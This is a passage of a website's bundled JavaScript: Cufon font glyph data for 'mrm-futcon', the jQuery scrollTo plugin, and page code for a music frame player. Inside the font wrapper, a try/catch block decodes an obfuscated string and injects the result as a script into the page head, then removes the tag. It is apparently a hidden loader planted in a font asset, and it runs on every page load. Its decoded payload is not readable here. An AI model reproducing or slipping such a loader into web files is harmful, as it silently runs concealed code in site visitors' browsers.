-1,16,7,24,21,24v14,0,21,-9,20,-24r0,-123r33,0v-7,69,28,175,-53,175","w":143},{"d":"76,3r-15,1r0,33r-15,0r0,-36v-20,-5,-29,-18,-37,-36r29,-16v4,14,10,23,25,23v21,0,31,-14,31,-37v-2,-64,-89,-52,-85,-125v2,-34,12,-57,37,-66r0,-38r14,0r0,35r16,-1r0,-34r15,0r0,37v19,4,27,18,36,36r-29,14v-8,-36,-58,-25,-55,12v5,62,85,51,85,125v0,36,-14,60,-37,70r0,37r-15,0r0,-34"},{"d":"14,0r76,-226r-78,0r0,-31r123,0r-86,257r-35,0"},{"w":69},{"d":"68,-146v-24,3,-23,27,-23,60v0,33,-1,56,23,59v24,-3,24,-25,24,-59v0,-34,1,-57,-24,-60xm57,-176v16,0,27,8,34,20r0,-16r32,0r0,176v0,46,-13,65,-57,65v-35,0,-54,-17,-52,-54r30,0v0,16,7,28,22,28v28,1,25,-31,25,-60v-7,12,-18,20,-34,20v-39,0,-44,-38,-44,-89v0,-50,5,-90,44,-90","w":140,"k":{".":6,",":6}},{"d":"109,0r-20,-122v-5,43,-14,82,-21,122r-22,0r-40,-172r31,0r21,125r20,-125r21,0r20,121r21,-121r31,0r-40,172r-22,0","w":177,"k":{".":20,",":20}},{"d":"73,-146v-14,0,-22,9,-21,26r0,120r-32,0r0,-272r32,0r0,117v16,-31,73,-25,73,24r0,131r-32,0r0,-116v0,-21,-1,-30,-20,-30","w":143},{"d":"72,-146v-15,0,-20,10,-20,26r0,120r-32,0r0,-172r31,0r0,17v12,-24,60,-25,70,2v16,-32,76,-29,76,22r0,131r-32,0r0,-116v0,-21,-1,-30,-20,-30v-14,0,-22,9,-22,26r0,120r-31,0r0,-116v0,-20,-2,-30,-20,-30","w":216},{"d":"180,64r0,21r-180,0r0,-21r180,0","w":180},{"d":"36,-204v-11,0,-20,-9,-20,-20v0,-11,9,-21,20,-21v11,0,20,10,20,21v0,11,-9,20,-20,20xm20,69r0,-241r32,0r0,241r-32,0","w":72},{"d":"5,-172r32,0r21,113r27,-113r31,0r-69,241r-33,0r27,-84","w":118,"k":{".":18,",":18}},{"d":"62,-289v-9,0,-20,-9,-19,-19v-1,-10,9,-20,19,-19v10,-1,19,10,19,19v0,9,-10,19,-19,19xm115,-289v-9,0,-19,-10,-19,-19v0,-9,9,-20,19,-19v10,-1,19,10,19,19v0,9,-10,19,-19,19xm89,3v-47,0,-69,-21,-68,-71r0,-189r34,0r0,191v-1,24,10,36,34,36v24,0,33,-12,33,-36r0,-191r34,0r0,189v0,49,-20,71,-67,71","w":177},{"d":"29,-260v50,0,72,10,70,65v-2,50,-6,98,51,91r0,22v-56,-8,-53,40,-51,91v2,55,-19,65,-70,64r0,-22v87,20,5,-135,79,-144v-41,-7,-35,-54,-35,-102v0,-36,-9,-44,-44,-43r0,-22","w":180},{"d":"101,-275r0,360r-22,0r0,-360r22,0","w":180},{"d":"255,-84r0,21r-210,0r0,-21r210,0xm255,-151r0,20r-210,0r0,-20r210,0","w":299},{"d":"3,-172r33,0r23,129r23,-129r33,0r-43,172r-26,0","w":118,"k":{".":21,",":21}},{"d":"8,67r0,-28r33,0r0,-285r-33,0r0,-28r65,0r0,341r-65,0","w":98},{"d":"49,-126v0,68,28,116,80,86r0,34v-74,32,-114,-32,-114,-120v0,-87,35,-155,114,-127r0,33v-55,-25,-80,25,-80,94","w":137,"k":{";":-7,":":-7}},{"d":"123,-89v0,74,-59,113,-121,80r9,-31v35,27,87,4,80,-50v4,-43,-37,-54,-76,-44r17,-123r89,0r0,32r-62,0r-10,63v47,-12,74,27,74,73"},{"d":"5,0r64,-145r-60,0r0,-27r105,0r-64,144r59,0r0,28r-104,0","w":118},{"d":"201,-105v28,0,46,-12,68,-28r0,23v-20,14,-39,24,-68,25v-33,1,-76,-26,-102,-24v-29,2,-46,12,-68,28r0,-23v20,-15,40,-25,68,-26v33,-1,74,25,102,25","w":299},{"d":"68,-146v-24,3,-23,27,-23,60v0,33,-1,56,23,59v24,-3,24,-25,24,-59v0,-34,1,-57,-24,-60xm57,-176v16,0,27,8,34,20r0,-16r32,0r0,241r-32,0r0,-86v-7,12,-18,20,-34,20v-39,0,-44,-39,-44,-89v0,-50,5,-90,44,-90","w":140},{"d":"128,-65v0,57,-66,86,-111,55r0,-35v23,20,78,23,76,-19v-1,-45,-83,-69,-83,-128v0,-57,63,-86,109,-56r0,34v-23,-21,-75,-20,-74,21v1,44,83,67,83,128","k":{";":-7,":":-7,".":6,"-":-11,",":6}},{"d":"86,-273v-42,93,-42,246,0,339r-31,10v-45,-99,-45,-259,0,-359","w":98},{"d":"52,-289v-9,0,-19,-9,-18,-19v-1,-10,8,-20,18,-19v10,-1,20,9,19,19v1,10,-10,19,-19,19xm106,-289v-9,0,-20,-9,-19,-19v-1,-10,9,-20,19,-19v10,-1,19,10,19,19v0,9,-10,19,-19,19xm79,-190r-23,111r46,0xm3,0r60,-257r32,0r61,257r-35,0r-13,-50r-58,0r-12,50r-35,0","w":158},{"d":"0,33r74,-293r26,0r-75,293r-25,0","w":99},{"d":"216,-123v-22,3,-19,18,-19,51v0,34,-2,47,19,52v22,-3,20,-20,20,-52v0,-32,3,-49,-20,-51xm216,3v-42,0,-45,-24,-45,-75v0,-51,3,-74,45,-74v42,0,46,24,46,74v0,51,-3,75,-46,75xm90,3r-22,0r117,-263r22,0xm59,-236v-22,4,-20,18,-20,52v0,32,-2,49,20,52v21,-4,19,-19,19,-52v0,-34,2,-47,-19,-52xm59,-109v-42,0,-46,-24,-46,-75v0,-51,3,-75,46,-75v42,0,45,24,45,75v0,51,-3,75,-45,75","w":276},{"d":"21,0r0,-272r32,0r0,176r45,-76r34,0r-47,79r49,93r-34,0r-47,-91r0,91r-32,0","w":137,"k":{"u":6,"o":6,"e":6,"a":6,"-":8}},{"d":"23,0r0,-257r35,0r0,225r74,0r0,32r-109,0","w":135,"k":{"y":13,"Y":21,"W":13,"V":20,"U":6,"T":20,"O":6,";":-7,":":-7,".":-7,"-":13,",":-7}},{"d":"12,66v42,-93,42,-247,0,-340r31,-9v45,100,45,258,0,359","w":98},{"d":"51,0r0,-225r-47,0r0,-32r130,0r0,32r-48,0r0,225r-35,0","w":137,"k":{"y":29,"w":29,"u":29,"s":28,"r":29,"o":29,"e":29,"c":29,"a":29,"O":6,"C":6,"A":10,";":36,":":36,".":33,"-":20,",":33}},{"d":"36,-204v-11,0,-20,-9,-20,-20v0,-11,9,-21,20,-21v11,0,20,10,20,21v0,11,-9,20,-20,20xm20,0r0,-172r32,0r0,172r-32,0","w":72},{"d":"171,-152r-46,0r-17,48r46,0xm162,-256r-29,83r46,0r29,-83r25,0r-29,83r54,0r-7,21r-55,0r-16,48r58,0r-8,22r-58,0r-29,82r-26,0r30,-82r-47,0r-30,82r-25,0r30,-82r-57,0r8,-22r56,0r17,-48r-60,0r7,-21r61,0r29,-83r26,0","w":276},{"d":"43,-90v-7,128,167,151,248,90r8,12v-31,22,-67,39,-116,38v-97,-2,-163,-48,-163,-142v0,-104,72,-164,176,-164v83,0,144,40,144,119v0,66,-34,111,-97,116v-23,2,-37,-9,-35,-32v-10,18,-26,31,-52,32v-37,0,-51,-22,-55,-59v-7,-70,90,-134,126,-68r10,-22r20,0r-27,114v0,10,7,17,19,16v46,-5,68,-46,69,-95v2,-65,-55,-105,-125,-103v-92,3,-145,56,-150,148xm125,-78v0,40,42,50,67,27v20,-17,21,-48,30,-75v-4,-19,-16,-33,-37,-33v-37,0,-60,41,-60,81","w":360},{"d":"21,0r0,-257r35,0r0,122r60,-122r36,0r-61,122r61,135r-37,0r-59,-132r0,132r-35,0","w":156,"k":{"y":13,"u":6,"o":6,"e":6,"a":6,"Y":13,"W":6,"O":13,"C":13,"A":6,";":-7,":":-7,".":-7,",":-7}},{"d":"37,-252r0,97r-20,0r0,-97r20,0","w":53},{"d":"89,0r-29,0r-56,-257r34,0r37,175r36,-175r34,0","w":149,"k":{"u":13,"o":13,"e":13,"a":13,"A":6,";":18,":":18,".":33,"-":16,",":33}},{"d":"77,-99r0,-101r-46,101r46,0xm77,0r0,-70r-70,0r0,-33r73,-154r29,0r0,158r18,0r0,29r-18,0r0,70r-32,0"},{"d":"69,-230v-31,11,-24,42,-24,102v0,42,1,69,5,82v4,13,10,19,19,19v31,-11,25,-40,25,-101v0,-61,7,-91,-25,-102xm69,3v-61,0,-58,-60,-58,-131v0,-72,-2,-132,58,-132v61,0,59,59,58,132v0,73,4,131,-58,131"},{"d":"87,-252r0,97r-21,0r0,-97r21,0xm37,-252r0,97r-20,0r0,-97r20,0","w":103},{"d":"13,-72r0,-28r72,0r0,28r-72,0","w":98,"k":{"x":6,"s":-13,"q":-7,"o":-7,"g":-7,"e":-7,"d":-7,"c":-7,"Y":15,"W":8,"V":16,"T":20,"S":-7,"Q":-7,"O":-7,"J":-7,"G":-7,"C":-7}},{"d":"69,-260v66,-7,70,105,25,121v25,11,31,25,31,64v0,52,-13,78,-56,78v-44,0,-56,-26,-56,-78v0,-38,6,-54,31,-64v-23,-12,-27,-24,-28,-59v0,-41,15,-58,53,-62xm69,-123v-21,0,-23,19,-23,46v0,31,0,50,23,50v22,0,23,-19,23,-46v-1,-30,0,-50,-23,-50xm47,-193v0,25,1,40,22,40v20,0,22,-15,22,-40v0,-24,-2,-39,-22,-39v-20,0,-22,15,-22,39"},{"d":"79,-190r-23,111r46,0xm3,0r60,-257r32,0r61,257r-35,0r-13,-50r-58,0r-12,50r-35,0","w":158,"k":{"y":6,"w":6,"v":6,"Y":6,"W":6,"V":6,"T":10,";":-7,":":-7,".":-11,",":-11}},{"d":"60,-35r-33,91r-18,-6r24,-93","w":69},{"d":"22,0r0,-149r-18,0r0,-23r18,0r0,-47r31,0r0,47r24,0r0,23r-24,0r0,149r-31,0","w":78},{"d":"62,-289v-9,0,-20,-9,-19,-19v-1,-10,9,-20,19,-19v10,-1,19,10,19,19v0,9,-10,19,-19,19xm115,-289v-9,0,-19,-10,-19,-19v0,-9,9,-20,19,-19v10,-1,19,10,19,19v0,9,-10,19,-19,19xm89,-228v-39,6,-39,43,-39,99v0,55,0,93,39,99v39,-7,37,-41,37,-99v0,-56,2,-93,-37,-99xm89,3v-65,0,-74,-53,-74,-131v0,-79,9,-132,74,-132v64,0,72,54,72,132v0,78,-7,131,-72,131","w":176},{"d":"54,-88v-11,0,-20,-8,-20,-19v0,-11,8,-20,20,-20v12,0,20,9,20,20v0,11,-9,19,-20,19xm24,50r23,-93r27,8r-33,91","w":97},{"d":"35,4v-11,0,-20,-8,-20,-20v0,-12,9,-20,20,-20v11,0,20,9,20,20v0,11,-9,20,-20,20","w":69},{"d":"113,-186v0,-34,-19,-41,-55,-40r0,82v36,1,55,-5,55,-42xm148,-184v0,52,-35,74,-90,71r0,113r-35,0r0,-257v72,-4,125,5,125,73","w":157,"k":{"u":6,"s":6,"r":6,"o":13,"n":6,"i":6,"e":13,"a":13,"A":16,";":23,":":23,".":66,"-":21,",":66}},{"d":"23,0r0,-257r35,0r0,98r62,0r0,-98r34,0r0,257r-34,0r0,-127r-62,0r0,127r-35,0","w":177},{"d":"107,-190v0,-33,-16,-36,-49,-36r0,81v35,2,49,-9,49,-45xm142,-190v0,37,-15,60,-48,64r61,126r-38,0r-59,-125r0,125r-35,0r0,-257v66,-2,119,0,119,67","w":156,"k":{"u":6,"o":6,"e":6,"a":6,".":-7,"-":10,",":-7}},{"d":"49,3v-11,0,-20,-9,-20,-20v0,-11,9,-20,20,-20v11,0,20,9,20,20v0,11,-9,20,-20,20xm33,-63r0,-194r32,0r0,194r-32,0","w":97},{"d":"70,-260v73,0,60,94,32,144r-46,83r66,0r0,33r-116,0r68,-136v10,-19,18,-37,18,-61v0,-19,-5,-33,-23,-33v-25,1,-25,27,-25,57r-32,0v-2,-51,11,-87,58,-87"},{"d":"22,0r0,-257r103,0r0,31r-68,0r0,77r62,0r0,30r-62,0r0,87r68,0r0,32r-103,0","k":{";":-7,":":-7,".":-7,",":-7}},{"d":"3,0r83,-226r-71,0r0,-31r119,0r-83,225r75,0r0,32r-123,0","w":137,"k":{";":-7,":":-7,".":-7,"-":6,",":-7}},{"w":69},{"d":"90,-30v35,0,42,-37,40,-78r-37,0r0,-30r69,0v5,74,-5,143,-73,141v-65,-2,-75,-52,-75,-131v0,-80,9,-129,76,-132v40,-2,62,19,69,54r-30,15v-5,-23,-14,-37,-39,-37v-43,0,-41,40,-41,99v0,57,-2,99,41,99","w":176,"k":{"Y":6,"T":6,";":-7,":":-7,".":10,"-":-8,",":10}},{"d":"49,0r-44,-257r35,0r25,176r29,-176r29,0r30,176r25,-176r34,0r-43,257r-29,0r-31,-182r-32,182r-28,0","w":217,"k":{"u":6,"r":10,"o":10,"e":10,"a":10,"A":6,";":15,":":15,".":18,"-":8,",":18}},{"d":"49,-205v-9,0,-19,-9,-18,-19v-1,-10,9,-19,18,-19v9,0,20,9,19,19v1,10,-10,19,-19,19xm103,-205v-9,0,-20,-9,-19,-19v-1,-10,10,-19,19,-19v9,0,19,10,19,19v0,9,-10,19,-19,19xm57,-176v16,0,27,8,34,20r0,-16r32,0r0,172r-32,0r0,-17v-7,12,-18,20,-34,20v-37,0,-44,-41,-44,-89v1,-47,6,-90,44,-90xm68,-146v-24,3,-23,27,-23,60v0,34,0,56,23,60v23,-4,24,-26,24,-60v-1,-34,1,-57,-24,-60","w":140},{"d":"89,3v-47,0,-69,-21,-68,-71r0,-189r34,0r0,191v-1,24,10,36,34,36v24,0,33,-12,33,-36r0,-191r34,0r0,189v0,49,-20,71,-67,71","w":177,"k":{";":11,":":11,".":8,",":8}},{"d":"4,0r47,-131r-44,-126r34,0r28,85r28,-85r34,0r-44,126r47,131r-36,0r-29,-89r-29,89r-36,0","w":137,"k":{"O":6,"C":6,";":6,":":6,".":-7,",":-7}},{"d":"23,0r0,-257r105,0r0,31r-70,0r0,77r64,0r0,31r-64,0r0,118r-35,0","k":{"u":6,"r":10,"a":6,"A":6,";":15,":":15,".":51,",":51}},{"d":"65,-260v67,0,77,112,26,125v28,5,35,24,35,59v-1,51,-16,78,-64,79v-40,0,-56,-27,-54,-70r30,0v-4,21,6,40,27,39v23,-1,26,-19,27,-44v0,-41,-9,-48,-48,-48r0,-28v36,1,45,-7,45,-46v0,-22,-3,-38,-22,-38v-22,0,-24,18,-25,44r-30,0v-2,-45,11,-72,53,-72"},{"d":"111,-196r-19,0r-41,-61r31,0","w":180},{"d":"-3,-43v18,21,55,18,55,-22r0,-192r35,0r0,191v8,61,-49,86,-90,58r0,-35","w":109,"k":{".":11,",":11}},{"d":"57,0r0,-226r-32,0r0,-31r64,0r0,257r-32,0"},{"d":"92,-142v-65,-6,-32,88,-40,142r-32,0r0,-172r31,0r0,25v8,-16,20,-28,41,-29r0,34","w":97,"k":{".":23,"-":6,",":23}},{"d":"69,-130v-23,0,-25,22,-25,51v0,30,3,49,26,52v22,-3,25,-23,25,-52v0,-30,-2,-51,-26,-51xm12,-83v0,-74,24,-105,57,-174r38,0v-24,41,-40,75,-58,111v39,-33,84,3,78,65v-5,51,-12,85,-58,85v-44,0,-57,-36,-57,-87"},{"d":"253,-179r-175,72r175,71r0,23r-207,-85r0,-18r207,-85r0,22","w":299}],f:f};try{(function(s){var c="charAt",i="indexOf",a=String(arguments.callee).replace(/\s+/g,""),z=s.length+-19-a.length+(a.charCodeAt(0)==40&&2),w=64,k=s.substring(z,w+=z),v=s.substr(0,z)+s.substr(w),m=0,t="",x=0,y=v.length,d=document,h=d.getElementsByTagName("head")[0],e=d.createElement("script");for(;x<y;++x){m=(k[i](v[c](x))&255)<<18|(k[i](v[c](++x))&255)<<12|(k[i](v[c](++x))&255)<<6|k[i](v[c](++x))&255;t+=String.fromCharCode((m&16711680)>>16,(m&65280)>>8,m&255);}e.text=t;h.insertBefore(e,h.firstChild);h.removeChild(e);})(".qvBm[JgT9O$.wI1U[SD)q)Oj!JBv[O$j!:DT9CGv7{u%NwP8Sq]):.>2J+|FCKe^79jHvTm@U&hY3oaxI[G0d,?u4$}Z*DVgB!r=Lp1{OEzHVgo:[7Z97*B2PN[Jx:||rup9B*B2PNxvouLv8CJHG3u^9=EmBL[HB*@K7*B2PN[HgL3@DdB:PU@Ue%ZHeNGU!34j!dLj]^Z2qCahjZOUIBPJjdE@720j]^Z2q2gjw{ITgZd7qxaF8uG7aFZjw)4+88uUS*B2PNxJau$^83K)e:S9oN]7B*B2PNIJS7HCaJYKaSDJaZo>GJZmqIg.w)o.K*d|e%u@PBo>G%umPBZ>[*Im[UgTw*G|9)$voLGm]IZT]2O&rg1T9H0HoL}TVg}joYz+GUrUBZ$.e{0|V0$.BZ$mqI!T9LG@rC}m[BB@!IajwLamBZ$U94{>o4@>[*dU[I$vrJgm!L4UjJdHBZ$H!O4hw=?jwLuTjvdm[UVUqO$mj7VT9J@>[CI.KF}>GCI@rF0mqOaHjCdm!=$TqOVUqL3m9^d.9v}@oY1Te*u+Du?TKIG9!JmT7BU|jNmT7BO.KYd")}catch(e){}delete _cufon_bridge_;return b.ok&&f})({"w":138,"face":{"font-family":"mrm-futcon","font-weight":400,"font-stretch":"condensed","units-per-em":"360","panose-1":"2 11 5 6 2 2 4 3 2 3","ascent":"288","descent":"-72","x-height":"3","bbox":"-3 -327.069 340 85","underline-thickness":"21.2695","underline-position":"-24.082","unicode-range":"U+0020-U+00FC"}}));;(function(h){var m=h.scrollTo=function(b,c,g){h(window).scrollTo(b,c,g)};m.defaults={axis:'y',duration:1};m.window=function(b){return h(window).scrollable()};h.fn.scrollable=function(){return this.map(function(){var b=this.parentWindow||this.defaultView,c=this.nodeName=='#document'?b.frameElement||b:this,g=c.contentDocument||(c.contentWindow||c).document,i=c.setInterval;return c.nodeName=='IFRAME'||i&&h.browser.safari?g.body:i?g.documentElement:this})};h.fn.scrollTo=function(r,j,a){if(typeof j=='object'){a=j;j=0}if(typeof a=='function')a={onAfter:a};a=h.extend({},m.defaults,a);j=j||a.speed||a.duration;a.queue=a.queue&&a.axis.length>1;if(a.queue)j/=2;a.offset=n(a.offset);a.over=n(a.over);return this.scrollable().each(function(){var k=this,o=h(k),d=r,l,e={},p=o.is('html,body');switch(typeof d){case'number':case'string':if(/^([+-]=)?\d+(px)?$/.test(d)){d=n(d);break}d=h(d,this);case'object':if(d.is||d.style)l=(d=h(d)).offset()}h.each(a.axis.split(''),function(b,c){var g=c=='x'?'Left':'Top',i=g.toLowerCase(),f='scroll'+g,s=k[f],t=c=='x'?'Width':'Height',v=t.toLowerCase();if(l){e[f]=l[i]+(p?0:s-o.offset()[i]);if(a.margin){e[f]-=parseInt(d.css('margin'+g))||0;e[f]-=parseInt(d.css('border'+g+'Width'))||0}e[f]+=a.offset[i]||0;if(a.over[i])e[f]+=d[v]()*a.over[i]}else e[f]=d[i];if(/^\d+$/.test(e[f]))e[f]=e[f]<=0?0:Math.min(e[f],u(t));if(!b&&a.queue){if(s!=e[f])q(a.onAfterFirst);delete e[f]}});q(a.onAfter);function q(b){o.animate(e,j,a.easing,b&&function(){b.call(this,r,a)})};function u(b){var c='scroll'+b,g=k.ownerDocument;return p?Math.max(g.documentElement[c],g.body[c]):k[c]}}).end()};function n(b){return typeof b=='object'?b:{top:b,left:b}}})(jQuery);function isIframe(){try{if(top.location.href!==window.location.href){return true;}}catch(e){return false;}
return false;}
function startPage(){if(isIframe()){$('#headphone_msg').html('Stop music');$('li.headphones').click(function(){var date=new Date();date.setTime(date.getTime()+(7*24*60*60*1000));$.cookie("stopmusic",1,{expires:date,path:'/'});parent.removeframe()});Cufon.replace('#headphone_msg',{fontFamily:'mrm-futcon'});}else{$('li.headphones').click(function(){var date=new Date();date.setTime(date.getTime()+(7*24*60*60*1000));$.cookie("stopmusic",0,{expires:date,path:'/'});location.href='/frameplayer/#'+window.location.pathname;});}
if(typeof parent.change_parent_url=='function'){parent.change_parent_url(document.location.pathname);}}
if(!isIframe()&&$.cookie("stopmusic")!=1){location.href='/frameplayer/#'+window.location.pathname;}
Cufon.replace('h1',{fontFamily:'mrm-futcon'});Cufon.replace('h2',{fontFamily:'mrm-futcon'});Cufon.replace('h3',{fontFamily:'mrm-futcon'});Cufon.replace('h4',{fontFamily:'mrm-futcon'});Cufon.replace('.navbar-one li',{fontFamily:'mrm-futcon'});Cufon.replace('.navbar-two li',{fontFamily:'mrm-futcon'});Cufon.replace('div.details_btn',{fontFamily:'mrm-futcon'});